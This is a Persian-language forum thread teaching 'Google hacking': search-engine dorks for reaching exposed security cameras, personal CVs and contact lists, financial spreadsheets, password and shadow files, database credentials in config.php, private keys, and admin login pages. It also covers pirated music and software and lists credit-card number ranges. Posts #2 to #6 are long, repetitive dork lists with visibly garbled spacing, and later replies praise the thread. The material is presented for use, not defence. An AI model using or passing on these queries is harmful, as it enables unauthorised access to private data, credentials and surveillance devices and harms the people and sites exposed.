• 1 Vote(s) - 5 Average
  • 1
  • 2
  • 3
  • 4
  • 5
با گوگل هک کنیم
#1
من در این ترفند میخوام اموزش بدم که چطوری از طریق گوگل هک کنیم !
منبع اولی از سایت نگهبان هست و بقیه خودم جمع اوری کردم.
امنیت اطلاعات کاری و شخصی برای همه ما امری مهم و حیاتی به شمار می رود. اما بسیاری از اوقات بدون هیچ گونه دقت و مراقبه ای اطلاعات مان را در اینترنت رها می کنیم و امید واهی داریم که در این دنیای شلوغ و بی در و پیکر نت، کسی نتواند آنها را بیابد. برای اینکه نشان دهیم اهمیت انتشار اطلاعات شخصی و اداری مهم و محرمانه بدون حفاظت و برنامه ریزی صحیح روی اینترنت، تا چه حد می تواند خطرناک باشد، در این مطلب به برخی شیوه های سرچ گوگل برای دست یابی به اطلاعات ویژه می پردازیم.

گوگل تقریبا80 درصد همه جستجوهای اینترنتی را پاسخگو است و به عنوان معروف ترین موتور جستجو شناخته می شود. گوگل این امکان را می دهد که نه تنها به منابع اطلاعاتی معروف بلکه به برخی از محرمانه ترین اطلاعاتی که نباید فاش شوند، دسترسی داشته باشید. در این قسمت طریقه استفاده از گوگل برای بهره برداری از اطلاعات حساس وب سایت ها را نشان خواهم داد. در زیر لیست برخی از هک ها که می تواند بااستفاده از گوگل صورت پذیرد قرار دارد.

۱. هک دوربین های امنیتی
دوربینهای زیادی برای نظارت بر اماکنی مانند پارکینگ ها، فضای دانشگاه ها، ترافیک خیابان ها و.. استفاده می شوند. این دوربین ها به راحتی توسط گوگل هک می شوند و شما می توانید تصاویر لحظه ای آن دوربین ها را ببینید. تمام کاری که باید انجام بدید استفاده از جستجوگر گوگل است. عبارت زیر را دقیقا در جستجوگر گوگل تایپ کرده و اینتر را فشار دهید.

Code:
inurl:”viewerframe?mode=motion”

روی نتایج جستجوها (به خصوص ۵ لینک اول) کلیک کنید، تا به دوربین های پخش زنده با امکان کنترل کامل آنها دسترسی داشته باشید.

اکنون شما به دوربین های زنده که درحال حاضر مشغول به کار هستند دسترسی دارید. همچنین میتوانید دوربین ها را به تمام چهار جهت بچرخانید و کارهایی مثل زوم به جلو و عقب را انجام دهید. این دوربینها اغلب سرعت بازیابی کمی دارند. اما دستورهای جستجوی دیگری هم وجود دارند که از طریق آن می توانید به دوربین های با سرعت بازیابی سریع تر، دست یابید. برای دسترسی به آنها، تنها کافی است از عبارت جستجوی زیر استفاده کنید

Code:
intitle:”Live View / – AXIS”

برای دسترسی به گروه های مختلفی از دوربین های زنده، روی هر یک از نتایج جستجو کلیک کنید. خب، شما با استفاده از گوگل، دوربین های امنیتی را هک کردید.

۲. هک اسناد محرمانه و شخصی
استفاده از گوگل امکان دسترسی به لیست حاوی ایمیل و سوابق کاری CV صدها نفر را به شما می دهد. این نتایج می توانند شامل اسناد حاوی آدرس، تلفن، تاریخ تولد، تحصیلات، سوابق کاری و... باشد. برای دستیابی به چنین اطلاعاتی، تنها چند ثانیه زمان لازم دارید:

Code:
intitle:”curriculum vitae” “phone * * *” “address *” “e-mail”

علاوه بر این می توانید به فهرستی از .xls (فایل های اکسل) که حاوی اطلاعات تماس، شامل آدرس و ایمیل گروه زیادی از افراد است، دست یابید. عبارت جستجوی زیر را بنویسید و اینتر را فشار دهید:
Code:
filetype:xls inurl:”email.xls”
همچنین برای دسترسی به اسناد حاوی اطلاعات حساب بانکی، گزارش های مالی و شماره کارت اعتباری از عبارت جستجوی زیر استفاده کنید:
Code:
intitle:index.of finances.xls

۳. هک با گوگل به منظور دسترسی به اجناس رایگان
به دنبال راهی برای دستیابی رایگان به موسیقی ها و کتاب های الکترونیک هستنید؟ خب اینجا راهی برای انجام این کار داریم. برای دانلود موسیقی، فقط عبارت جستجوی زیر را در کادر وارد کنید و اینتر را بزنید:
Code:
“?intitle:index.of?mp3 eminem“
اکنون به فهرست تمام آلبوم های امینم دسترسی دارید و میتوانید آهنگ ها را به انتخاب خودتان دانلود کنید. به جای امینم میتوانید اسم خواننده مورد علاقه تان را جایگزین کنید.برای جستجو کتابهای الکترونیکی فقط کافی است امینم را با نام کتاب مورد علاقه تان جایگزین کنید. همچنین mp3 را به pdf ,zip یا rar تغییر دهید.

۴. از طریق گوگل و برخی فنون جستجو، می توانیم اطلاعات جالبی پیدا کنیم

Code:
intitle:”Index of” passwords modified

allinurl:authuserfile.txt

“access denied for user” “using password”

“A syntax error has occurred” filetype:ihtml

allinurl: admin mdb

“ORA-00921: unexpected end of SQL command”

inurl:passlist.txt

“Index of /backup”

“Chatologica MetaSearch” “stack tracking:”

Amex Numbers: 300000000000000..399999999999999

MC Numbers: 5178000000000000..5178999999999999

visa 4356000000000000..4356999999999999

“parent directory ” /appz/ -xxx -html -htm
php -shtml -opendivx -md5 -md5sums

“parent directory ” DVDRip -xxx -html -htm
php -shtml -opendivx -md5 -md5sums

“parent directory “Xvid -xxx -html -htm -php
-shtml -opendivx -md5 -md5sums

“parent directory ” Gamez -xxx -html -htm -p
hp -shtml -opendivx -md5 -md5sums

“parent directory ” MP3 -xxx -html -htm -php
-shtml -opendivx -md5 -md5sums

“parent directory ” Name of Singer or album
-xxx -html -htm -php -shtml -opendivx -md5-
md5sums

توجه کنید که من تنها لغت بعد از فولدر اصلی را تغییر داده ام، آن را به هر چه که می خواهید تغییر دهید. به موارد زیادی دست خواهید یافت.




روش دوم: این عبارت را در جستجوی گوگل قرار دهید
Code:
?intitle:index.of? mp3
کافی است فقط اسم آهنگ، موسیقی دان یاخواننده را اضافه کنید
Code:
?intitle:index.of? mp3 jackson
روش سوم: این عبارت را در گوگل جستجو کنید

Code:
inurl:microsoft filetype:iso
می توانید عبارت را به هرچه می خواهید تغییر دهید. مثلا microsoft به adobe یا iso به zip و ...


به عنوان مثال میتوانید شماره کارت اعتباری, رمزهای عبور, نرم افزار/MP3 و... را پیدا کنید. در زیر نمونه هایی از جستجوهای جالب گوگب را می بینید. از این طریق می توانیم اطلاعات شخصی افراد که ممکن است دوست نداشته باشند بقیه به آنها دسترسی داشته باشند را بیابیم. بعد از امتحان کردن برخی از این موارد، سعی کنید از مهارت جستجوی خودتان برای دستیابی به اطلاعاتی که می تواند برای تان جالب باشد استفاده کنید.

روش اول: تعدادی از این جستجوها را امتحان کنید.
Code:
intitle:”Index of” passwords modified

allinurl:authuserfile.txt

“access denied for user” “using password”

“A syntax error has occurred” filetype:ihtml

allinurl: admin mdb

“ORA-00921: unexpected end of SQL command”

inurl:passlist.txt

“Index of /backup”

“Chatologica MetaSearch” “stack tracking:”

Amex Numbers: 300000000000000..399999999999999

MC Numbers: 5178000000000000..5178999999999999

visa 4356000000000000..4356999999999999

“parent directory ” /appz/ -xxx -html -htm
php -shtml -opendivx -md5 -md5sums

“parent directory ” DVDRip -xxx -html -htm
php -shtml -opendivx -md5 -md5sums

“parent directory “Xvid -xxx -html -htm -php
-shtml -opendivx -md5 -md5sums

“parent directory ” Gamez -xxx -html -htm -p
hp -shtml -opendivx -md5 -md5sums

“parent directory ” MP3 -xxx -html -htm -php
-shtml -opendivx -md5 -md5sums

“parent directory ” Name of Singer or album
-xxx -html -htm -php -shtml -opendivx -md5-
md5sums

توجه کنید که من تنها لغت بعد از فولدر اصلی را تغییر داده ام، آن را به هر چه که می خواهید تغییر دهید. به موارد زیادی دست خواهید یافت.



روش دوم: این عبارت را در جستجوی گوگل قرار دهید
Code:
?intitle:index.of? mp3
کافی است فقط اسم آهنگ، موسیقی دان یاخواننده را اضافه کنید
Code:
?intitle:index.of? mp3 jackson

روش سوم: این عبارت را در گوگل جستجو کنید
Code:
inurl:microsoft filetype:iso
می توانید عبارت را به هرچه می خواهید تغییر دهید. مثلا microsoft به adobe یا iso به zip و ...


Code:
“# -FrontPage-” inurl:service.pwd
رمزهای عبور Frontpage.. فهرستی از نتایج جذاب را در بر خواهد داشت

“http://:@www” domainnameاین عبارتی برای دستیابی به رمز عبور از طریق موتورهای جستجو (نه فقط گوگل) است. شما باید عبارت جستجوی زیر را با اسم دامنه بدون پسوندهایی چون .com یا .net بنویسید.

“sets mode: +k”این جستجو رمزهای عبور IRC را از فهرست چت IRC نشان میدهد.
Code:
allinurl: admin mdb
با این عبارت جستجو هم به صفحات زیادی حاوی نام کاربری و رمزعبور پایگاه داده های تعداد زیادی از سایت ها دست خواهید یافت.
Code:
intitle:”Index of” config.php
این جستجو سایتهای دارای فایل “config.php”را لیست می کند. به منظور رهایی از بحث های تکنیکی،این نوع فایل حاوی نام کاربری و رمزعبور برای پایگاه داده های SQL است.

intitle:index.of.etcجستجو در پوشه etc سایت ها می تواند بسیار سرگرم کننده باشد. زیرا بسیاری اوقات رمزهای عبور فراوانی را در آن می توانید بیابید.

به نظر می رسد الان دیگر کاملا متوجه شده اید که چه خطراتی می تواند زندگی آنلاین شما را تهدید کند. اگر قصد خرید کالا به صورت آنلاین دارید، مطمئن شوید سایت که از امنیت معمول برخوردار است. یکی از این علائم می تواند قفل زرد رنگ پایین صفحه مرورگر باشد.
همیشه به حس خودتان اعتماد کنید. اگر ظاهر سایتی آنقدر بد و ضعیف و به هم ریخته است که نمی تواند حس اعتماد و امنیت را در شما برانگیزد، احتمالا آنقدر هم خوب نیست که بتواند امنیت اطلاعات شما را حفظ کند. نمیگویم که خرید آنلاین انجام ندهید زیرا بهترین قسمت اینترنت، همین است. فقط در مورد سایت هایی که اطلاعات بانکی شما را می خواهند و علامت قفل در پایین مرورگرشما ندارند، احتیاط کنید.
  Reply
#2
All Google Hacking Keywords


بای این کدها میتونید کلی باگ از سایت ها و خیلی کارهای دیگر کنید لطفا استفاده درست کنید فردا پس فردا 2 3 تا گوره هک پیدا نشه Rolleyes

Code:
Code:

admin account info" filetype: log

!Host=* .* intext:enc_UserPassword=* ext:pcf

"# - FrontPage- " ext:pwd inurl:(service | authors | administrators | users) "# - FrontPage- "

inurl: service.pwd

"Aut oCreate=TRUE password=* "

"ht t p: / / * : * @www" domainname

"index of/" "ws_ftp.ini" "parent direct ory"

"liveice configuration file" ext:cfg - site: sourceforge.net

"parent directory" +proftpdpasswd

"Duclassified" - site: duware.com "DUware All Right s reserved"
"duclassmate" - site:duware.com
"Dudirectory" - site: duware.com
"dudownload" -site:duware.com
"Elit e Forum Version * .* "
"Link Depart ment "


"set s mode: +k"

"your password is" filetype: log

"DUpaypal" - site: duware.com

allinurl: admin mdb

aut h_user_file.t xt

config.php

eggdrop filetype:user user

enable password | secret "current configuration" - intext:the

etc (index.of)
  Reply
#3
Code:
ext:asa | ext:bak intext:uid intext:pwd - "uid..pwd" database | server | dsn

ext:inc "pwd=" "UID="

ext : ini eudora.ini

ext : ini Version=4.0.0.4 password

ext:passwd - intext:the - sample - example

ext:txt inurl:unattend.txt

ext:yml database inurl:config

filetype:bak createobject sa

filet ype: bak inurl: "ht access| passwd| shadow| ht users"

filetype:cfg mrtg "target

filetype: cfm "c fapplication name" password

filetype:conf oekakibbs

filetype:conf slapd.conf

filetype: config config intext:appSettings "User ID"

filetype:dat "password.dat"

filetype:dat inurl:Sites.dat

filetype:dat wand.dat

filetype:inc dbconn

filetype:inc intext:mysql_connect

filetype:inc mysql_connect OR mysql_pconnect

filetype:inf sysprep

filetype: ini inurl:"serv- u.ini" filetype: ini inurl:flashFXP.ini filetype: ini ServUDaemon

filetype: ini wcx_ftp

filetype: ini ws_ftp pwd

filetype: ldb admin

filetype:log "See ` ipsec - - copyright"

filetype: log inurl:"password.log"

filetype: mdb inurl:users.mdb

filetype:mdb wwforum

filetype:netrc password

filetype: pass pass int ext: userid
filetype:pem intext:private
filetype:properties inurl:db intext:password


filetype:pwd service

filetype:pwl pwl

filetype:reg reg +intext:"defaultusername" +intext:"defaultpassword"

filetype: reg reg +int ext : â? WINVNC3â?

filetype: reg reg HKEY_CURRENT_USER SSHHOSTKEYS

filetype:sql "insert into" (pass| passwd| password)

filetype: sql ("values * MD5" | "values * password" | "values * encrypt ")

filetype: sql +"IDENTIFIED BY" - cvs

filetype: sql password

filetype:url +inurl:"ftp://" +inurl:";@" filetype: xls username password email ht passwd

htpasswd / htgroup

htpasswd / htpasswd.bak

intext:"enable password 7"

int ext:"enable secret 5 $"

int ext : "

EZGu est book"

int ext : "

Web Wiz Journal"

intitle:"index of" intext:connect.inc

int it le: "index of" int ext : globals.inc

int it le: "Index of" passwords modified

intitle:"Index of" sc_serv.conf sc_serv content

intitle:"phpinfo()" +"mysql.default_password" +"Zend s• ri ting Language Engine"

intitle:dupics inurl:(add.asp | default.asp | view.asp | voting.asp) - site: duware.com

intitle:index.of administrators.pwd

intitle:Index.of etc shadow

intitle:index.of intext:"secring.skr"| "secring.pgp"| "secring.bak"

intitle:rapidshare int ext:login

inurl: "c alendars• ri t / users.t xt "

inurl:"edit or/list .asp" | inurl:"database_edit or.asp" | inurl:"login.asa" "are set "

inurl:"GRC.DAT" intext:"password"

inurl: "Sit es.dat "+"PASS="

inurl:"slapd.conf" intext:"credentials" - manpage - "Manual Page" - man: - sample
inurl:"slapd.conf" intext:"rootpw" - manpage - "Manual Page" - man: - sample
inurl:"wvdial.conf" intext:"password"


inurl: / db/ main.mdb

inurl: / wwwboard

inurl: / yabb/ Members/ Admin.dat

inurl:ccbill filet ype: log

inurl:cgi- bin inurl:calendar.cfg

inurl:chap- secrets - cvs

inurl:config.php dbuname dbpass

inurl: filezilla.xml - cvs

inurl:lilo.conf filetype:conf password - tatercounter2000 -bootpwd -man

inurl:nuke filetype:sql

inurl:ospfd.conf intext:password - sample -test -tutorial - download

inurl:pap- secrets - cvs

inurl: pass.dat

inurl:perform filetype: ini

inurl:perform.ini filet ype: ini

inurl:secring ext:skr | ext:pgp | ext:bak

inurl:server.cfg rcon password

inurl:vent rilo_srv.ini adminpassword

inurl:vtund.conf intext:pass - cvs

inurl:zebra.conf intext:password - sample -test -tutorial - download

LeapFTP int it le: "index.of./ " sit es.ini modified

mast er.passwd

mysql hist ory files

NickServ regist ration passwords

passlist

passlist.txt (a better way)

passwd

passwd / et c (reliable)

people.lst

psyBNC config files

pwd.db

server- dbs "intitle:index of"

signin filetype: url

spwd.db / passwd

t rillian.ini

wwwboard WebAdmin inurl:passwd.txt wwwboard| webadmin

[WFClient] Password= filetype:ica

int it le: "remote assessment " OpenAanval Console

int it le:opengroupware.org "resistance is obsolete" "Report Bugs" "Username" "password"

"bp blog admin" intitle:login | intitle:admin - site: johnny.ihackstuff.com

"Emergisoft web applications are a part of our"

"Est ablishing a secure Int egrat ed Light s Out session wit h" OR int it le: "Data Frame - Browser

not HTTP 1.1 compat ible" OR int it le: "HP Int egrat ed Light s-

"Host ingAccelerat or" int it le: "login" +"Username" - "news" - demo

"iCONECT 4.1 : : Login"

"IMail Server Web Messaging" int it le: login

"inspanel" int it le:"login" - "cannot " "Login ID" - sit e:inspediumsoft .com

"intitle: 3300 Integrated Communications Platform" inurl:main.htm

"Login - Sun Cobalt RaQ"

"login prompt " inurl:GM.cgi

"Login t o Usermin" inurl:20000
"Microsoft CRM : Unsupported Browser Version"
"OPENSRS Domain Management " inurl:manage.cgi


"pcANYWHERE EXPRESS Java Client "

"Please authenticate yourself to get access to the management interface"

"please log in"

"Please login wit h admin pass" - "leak" - sourceforge

"Cut eNews" "2003..2005 Cut ePHP"
"DWMail" password int it le: dwmail
"Merak Mail Server Software" - .gov - .mil - .edu - site: merakmailserver.com
"Midmart Messageboard" "Administ rat or Login"
"Monst er Top List " MTL numrange:200-
"UebiMiau" - site: sourceforge.net


"sit e info for" "Ent er Admin Password"

"SquirrelMail version" "By t he SquirrelMail Development Team"

"SysCP - login"

"This is a rest ricted Access Server" "Javas• ri t Not Enabled!"| "Messenger Express" - edu - ac

"This sect ion is for Administ rators only. If you are an administ rat or t hen please"

"t t awlogin.cgi/ ?act ion="

"VHCS Pro ver" - demo

"VNC Deskt op" inurl:5800

"Web- Based Management " "Please input password t o login" - inurl:johnny.ihackst uff.com

"WebExplorer Server - Login" "Welcome t o WebExplorer Server"

"WebSTAR Mail - Please Log I n"

"You have request ed access t o a rest ricted area of our website. Please authenticate

yourself to continue."

"You have requested to access the management functions" - .edu

(int it le: "Please login - Forums

UBB.threads")| (inurl:login.php "ubb")

(int it le: "Please login - Forums

WWWThreads")| (inurl: "wwwt hreads/ login.php")| (inurl: "wwwt hreads/ login.pl?Cat =")

(intitle:"rymo Login")| (intext:"Welcome to rymo") - family

(intitle:"WmSC e-Cart Administration")| (intitle:"WebMyStyle e-Cart Administration")

(inurl:"ars/cgi- bin/arweb?O=0" | inurl:arweb.jsp) - site:remedy.com - site:mil

4images Administ rat ion Cont rol Panel

allintitle:"Welcome to the Cyclades"

allinurl: "exchange / logon.asp"

allinurl:wps/portal/ login

ASP.login_aspx "ASP.NET_SessionId"

CGI: IRC Login

ext:cgi int itle:"control panel" "enter your owner password t o continue!"

ez Publish administ rat ion

filetype:php inurl:"webeditor.php"





  Reply
#4
Code:
int it le: "Merak Mail Server Web Administ rat ion" - ihackst uff.com

intitle:"microsoft certificate services" inurl:certsrv

int it le: "MikroTik Rout erOS Managing Webpage"

int it le: "MX Cont rol Console" "If you can't remember"

intitle:"Novell Web Services" "GroupWise" - inurl:"doc/11924" - .mil - .edu - .gov - filetype:pdf

int it le: "Novell Web Services" int ext : "Select a service and a language."

int it le: "oMail- admin Administ ration - Login" - inurl:omnis.ch

int it le: "OnLine Recruit ment Program - Login"

intitle:"Philex 0.2* " -s• ri t - site:freelists.org
int it le: "PHP Advanced Transfer" inurl:"login.php"
intitle:"php icalendar administration" - site: sourceforge.net
intitle:"php icalendar administration" - site: sourceforge.net


int it le: "phpPgAdmin - Login" Language

int it le: "PHProjekt - login" login password

int it le: "please login" "your password is * "

int it le:"Remote Deskt op Web Connect ion" inurl:t sweb

int it le: "SFXAdmin - sfx_global" | int it le: "SFXAdmin - sfx_local" | int it le: "SFXAdmin - sfx_t est "

intitle:"SHOUTcast Administrator" inurl:admin.cgi

int it le: "site administ rat ion: please log in" "sit e designed by emarket sout h"

intitle:"Supero Doctor III" - inurl:supermicro

intitle:"SuSE Linux Openexchange Server" "Please activate Javas• ri t !"

intitle:"teamspeak server- administration

intitle:"Tomcat Server Administration"

intitle:"TOPdesk ApplicationServer"

int it le: "TUTOS Login"

int it le: "TWIG Login"

intitle:"vhost" intext:"vHost . 2000- 2004"

int it le: "Virt ual Server Administ ration Syst em"

int it le: "VisNetic WebMail" inurl: "/ mail/ "

intitle:"VitalQIP IP Management System"

intitle:"VMware Management Interface: " inurl:"vmware/en/"
int it le: "VNC viewer for Java"
intitle:"web- cyradm"| "by Luc de Louw" "This is only for authorized users" - t ar.gz - site: web-


cyradm.org

int it le: "WebLogic Server" int it le: "Console Login" inurl:console
int it le: "Welcome Site/ User Administ rat or" "Please select t he language" - demos
int it le: "Welcome t o Mailt raq WebMail"


intitle:"welcome to netware * " -site:novell.com

int it le: "WorldClient " int ext : "? (2003| 2004) Alt - N Technologies."

intitle:"xams 0.0.0..15 - Login"

int it le: "XcAuct ionLit e" | "DRIVEN BY XCENT" Lit e inurl:admin

int it le: "XMail Web Administ rat ion Int erface" int ext : Login int ext :password

int it le: "Zope Help Syst em" inurl:HelpSys

int it le: "ZyXEL Prest ige Rout er" "Enter password"

intitle:"inc. vpn 3000 concentrator"

int it le: ("TrackerCam Live Video") | ("TrackerCam Application Login")| ("Trackercam Remot e") -

t rackercam. com

intitle:asterisk.management.portal web- access

intitle:endymion.sak?.mail.login.page | inurl:sake.servlet

intitle:Group- Office "Enter your username and password to login"

int it le: ilohamail "

IlohaMail"

int it le: ilohamail int ext : "Version 0.8.10" "

IlohaMail"

int it le: IMP inurl: imp/ index.php3

int it le:Login * Webmailer

int it le:Login int ext : "RT is ? Copyright "
  Reply
#5
Code:
int it le: "Web Server St atist ics for* * * * "
int it le: "web server st atus" SSH Telnet
int it le: "Welcome t o F- Secure Policy Manager Server Welcome Page"


int it le: "welcome.t o.squeezebox"

int it le:admin int it le: login

intitle:Bookmarks inurl:bookmarks.html "Bookmarks

int it le: index.of "Apache" "server at"

intitle:index.of cleanup.log intitle:index.of dead.letter intitle:index.of inbox

int it le: index.of inbox dbx

intitle:index.of ws_ftp.ini

intitle:intranet inurl:intranet +intext:"phone"

inurl: "/ axs/ ax- admin.pl" - s• ri t

inurl: "/ cricket / grapher.cgi"

inurl: "bookmark.ht m"

inurl:"c act i" +inurl:"graph_view.php" +"Set tings Tree View" - cvs - RPM

inurl: "n ewslet t er/ admin/ "

inurl:"newsletter/admin/" intitle:"newsletter admin"

inurl: "put t y.reg"

inurl:"smb.conf" intext:"workgroup" filetype:conf conf

inurl:* db filetype:mdb

inurl: / cgi- bin/ pass.t xt

inurl: / _layout s/ set t ings

inurl:admin filetype:xls

inurl:admin int it le: login

inurl:backup filetype:mdb

inurl: build.err

inurl: cgi- bin/ print env

inurl:cgi- bin/testcgi.exe "Please distribute TestCGI"

inurl: changepassword.asp

inurl: ds.py

inurl:email filet ype: mdb

inurl: fcgi- bin/ echo

inurl:forum filetype: mdb

inurl:forward filetype:forward -cvs

inurl: get msg.ht ml int it le: hot mail

inurl:log.nsf - gov

inurl:main.php phpMyAdmin

inurl:main.php Welcome to phpMyAdmin

inurl: net scape.hst inurl: net scape.hst inurl: net scape.ini

inurl:odbc.ini ext : ini - cvs

inurl: perl/ print env

inurl:php.ini filetype: ini

inurl:preferences.ini "[ emule] "

inurl:profiles filetype:mdb

inurl:report "EVEREST Home Edit ion "

inurl:server- info "Apache Server Information"

inurl:server- status "apache" inurl: snit z_forums_2000.mdb inurl:ssl.conf filetype:conf

inurl: t dbin

inurl:vbstats.php "page generated"

inurl:wp- mail.php + "There doesn't seem t o be any new mail."

inurl: XcCDONTS.asp

www.parsicoders.com

All Google Hacking Keywords

by amin mansouri




















ipsec.conf
ipsec.secret s
ipsec.secret s


Lot usDo m i n o address books

mail filetype:csv - site: gov intext:name

Microsoft Money Dat a Files

mt - db- pass.cgi files

MySQL t abledat a dumps

myst uff.xml - Trillian dat a files

OWA Public Folders (direct view)

Peoples MSN cont act list s

php- addressbook "This is t he addressbook for * " - warning

phpinfo()

phpMyAdmin dumps
phpMyAdmin dumps
privat e key files (.csr)
privat e key files (.key)


Quicken dat a files

rdbqds - site:.edu - site: .mil - site:.gov

robot s.t xt

site: edu admin grades

site: www.mailinator.com inurl:ShowMail.do

SQL dat a dumps

Squid cache server report s

Unreal IRCd

WebLog Referrers

Welcome to ntop!

Fichier cont enant des informat ions sur le r?seau :

filetype:log intext:"ConnectionManager2"

"apricot - admin" 00h

"by Reimar Hoven. All Right s Reserved. Disclaimer" | inurl:"log/logdb.dt a"

"Network Host Assessment Report " "Internet Scanner"

"Output produced by SysWatch * "

"Phorum Admin" "Dat abase Connect ion" inurl:forum inurl:admin

"phpOpenTracker" St atist ics

"powered | performed by Beyond Security's Automated Scanning" - kazaa - example

"Shadow Securit y Scanner performed a vulnerabilit y assessment "

"SnortSnarf alert page"

"The following report cont ains confident ial informat ion" vulnerabilit y - search

"The statistics were last upd t d" "Daily"- microsoft.com

"t his ....... is working fine!" "ent er * " "URL* * * " * visit

"This report lists" "ident ified by Int ernet Scanner"
"Traffic Analysis for" "RMON Port * on unit * "
"Version Info" "Boot Version" "Int ernet Set t ings"
((inurl:ifgraph "Page generat ed at ") OR ("This page was built using ifgraph"))
Analysis Console for Incident Dat abases


ext:cfg radius.cfg

ext :cgi int ext: "nrg- " " This web page was created on "

filetype: pdf "Assessment Report" nessus
filetype:php inurl:ipinfo.php "Distributed Intrusion Detection System"
filetype:php inurl:nqt intext:"Network Query Tool"


filetype: vsd vsd network - samples - examples

intext:"Welcome to the Web V.Networks" intitle:"V.Networks [Top]" -filetype:htm

www.parsicoders.com

All Google Hacking Keywords

by amin mansouri
  Reply
#6
روش های که ذکر شده هر کدوم یه یه نحوی هست و تشریح هر کدوم از روش ها خیلی وقت میبره خودتون برید دنبالش ادامه :
Code:
"Unable t o jump t o row" "on MySQL result index" "on line"

"Unclosed quot at ion mark before t he character st ring"

"Warning: Bad argument s t o (join| implode) () in" "on line" - help - forum

"Warning: Cannot modify header informat ion - headers already sent "

"Warning: Division by zero in" "on line" - forum

"Warning: mysql_connect(): Access denied for user: '* @* " "on line" - help - forum

"Warning: mysql_query()" "invalid query"

"Warning: pg_connect (): Unable t o connect t o Post greSQL server: FATAL"

"Warning: Supplied argument is not a valid File- Handle resource in"
"Warning:" "failed t o open st ream: HTTP request failed" "on line"
"Warning:" "SAFE MODE Rest rict ion in effect." "The s• ri t whose uid is" "is not allowed t o
access owned by uid 0 in" "on line"


"SQL Server Driver][SQL Server]Line 1: Incorrect syntax near"

An unexpected t oken "END- OF- STATEMENT" was found

Coldfusion Error Pages

filet ype: asp + "[ ODBC SQL"

filetype: asp "Cust om Error Message" Cat egory Source

filet ype: log "PHP Parse error" | "PHP Warning" | "PHP Error"

filetype:php inurl:"logging.php" "Discuz" error

ht://Dig htsearch error

IIS 4.0 error messages

IIS web server error messages

Int ernal Server Error

int ext : "Error Message : Error loading required libraries." int ext : "Warning: Failed opening" "on line" "include_pat h" int it le: "Apache Tomcat " "Error Report "

intitle:"Default PLESK Page"

intitle:"Error Occurred While Processing Request" +WHERE (SELECT| INSERT) filetype: cfm
int it le: "Error Occurred" "The error occurred in" filetype: cfm
int it le: "Error using Hypernews" "Server Software"


intitle:"Execution of this s• ri t not permitted"

intitle:"Under construction" "does not currently have"

intitle:Configuration.File inurl:softcart.exe

MYSQL error message: supplied argument....

my sql error wit h query

Netscape Application Server Error page
ORA- 00921: unexpected end of SQL command
ORA- 00921: unexpected end of SQL command


ORA- 00936: missing expression

PHP application warnings failing "include_pat h"

sit ebuildercont ent

sit ebuilderfiles

sit ebuilderpict ures

Snitz! forums db path error

SQL synt ax error
Supplied argument is not a valid Post greSQL result
warning "error on line" php sablot ron


Windows 2000 web server error messages

"f tp://" "www.eastgame.net"

"ht ml allowed" guest book

": vBullet in Version 1.1.5"

"Select a database to view" int it le: "filemaker pro"

"set up t he administ rat or user" inurl:pivot

"There are no Administ rators Account s" inurl:admin.php - my sql_fet ch_row

"Welcome t o Administ rat ion" "General" "Local Domains" "SMTP Aut hent icat ion" inurl:admin

"Welcome to Intranet"

www.parsicoders.com

All Google Hacking Keywords

by amin mansouri




















"Welcome to PHP- Nuke" congratulations

"Welcome to the Prestige Web- Based Configurator"

"YaBB SE Dev Team"

"y ou can now password" | "t his is a special page only seen by you. your profile visit ors"

inurl: imc haos

("Indexed.By"| "Monitored.By") hAcxFtpScan

(inurl:/shop.cgi/page=) | (inurl:/shop.pl/page=)

allinurl:"index.php" "sit e=sglinks"

allinurl: inst all/ inst all.php

allinurl:intranet admin

filetype: cgi inurl:"fileman.cgi"

filetype: cgi inurl:"Web_Store.cgi"

filetype:php inurl:vAuthenticate

filetype: pl intitle:"Ultraboard Setup"

Gallery in configurat ion mode
Hassan Consult ing's Shopping Cart Version 1.18
int ext : "Warning: * am able * writ e * * configuration file" "includes/ configure.php" -


intitle:"Gateway Configuration Menu"

intitle:"Horde :: My Portal" - "[Tickets"

int it le: "Mail Server CMailServer Webmail" "5.2"

intitle:"MvBlog powered"
intitle:"Remote Desktop Web Connection"
int it le: "Samba Web Administ ration Tool" int ext : "Help Workgroup"


int it le: "Terminal Services Web Connect ion"

int it le: "Uploader - Uploader v6" - pixloads.com

int it le: osCommerce inurl: admin int ext : "redist ribut able under t he GNU" int ext : "Online Cat alog"

- demo - site: oscommerce.com

intitle:phpMyAdmin "Welcome to phpMyAdmin * * * " "running on * as root@* " intitle:phpMyAdmin "Welcome to phpMyAdmin * * * " "running on * as root@* " inurl: "/ NSearch/ AdminServlet "

inurl:"index.php? module=ew_filemanager"

inurl: aol* / _do/ rss_popup?blogI D=

inurl: foot er.inc.php
inurl: info.inc.php
inurl: ManyServers.ht m


inurl:newsdesk.cgi? inurl:"t ="

inurl: pls/ admin_/ gat eway.ht m

inurl: rpSys.ht ml

inurl:search.php vbulletin

inurl: servlet / webacc

natterchat inurl:home.asp -site:natterchat.co.uk

XOOPS Cust om Inst allat ion

inurl:htpasswd filetype:htpasswd

inurl: yapboz_det ay.asp

+ View Webcam User Accessing

allinurl:control/ multiview

inurl:" View erFram e?Mode= "

intitle:"WJ-NT104 Main Page"

inurl:netw_tcp.shtm l

intitle:"supervisioncam protocol"
  Reply
#7
عجب چیزی بود!
دمت گرم.
فقط کاش اگر وقت کردی در مورد قسمت دوم نوشته هات هم توضیح بدی.
با سپاس
انجام پروژه های دانشجویی با ارزان ترین قیمت
انجام پروژه های برنامه نویسی
انجام پروژه ای الکترونیک و برق
ترجمه با قیمت ارزان
https://www.ele-pro.ir

  Reply
#8
درود پارسا جان
من هم چند تا کتاب در مورد (هک گوگل-e bay-یاهو-فایر فاکس-جی میل-
-Visual Studio
HacksNokia- Smartphone Hacks Linux Desktop Hacksو.......) دارم ولی انگیلیسی و من هیچی متوجه
نمی شم و همین رو می دونم پیشرفتن اگر حوصله خوندنس رو داری بران اپلود کنم

گفتمش نقاش را نقشی بکش از زندگی
با قلم نقش حبابی بر لب دریا کشید
با همه چيز درآميز و با هيچ چيز آميخته مشو

که در انزوا پاک ماندن نه سخت است و نه با ارزش
-
-
-



Away
  Reply
#9
حالشو ببرید
Code:
intitle: private, protected, secret, secure, winnt
intitle:"DocuShare" inurl:"docushare/dsweb/" -faq -gov -edu
"#mysql dump" filetype:sql
"#mysql dump" filetype:sql faaaaeafc
"allow_call_time_pass_reference" "PATH_INFO"
"Certificate Practice Statement" inurlPDF | DOC)

LeapFTP intitle:"index.of./" sites.ini modified
master.passwd
mysql history files
NickServ registration passwords
passlist
passlist.txt (a better way)
passwd
passwd / etc (reliable)
people.lst
psyBNC config files
pwd.db
signin filetype:url
spwd.db / passwd
trillian.ini
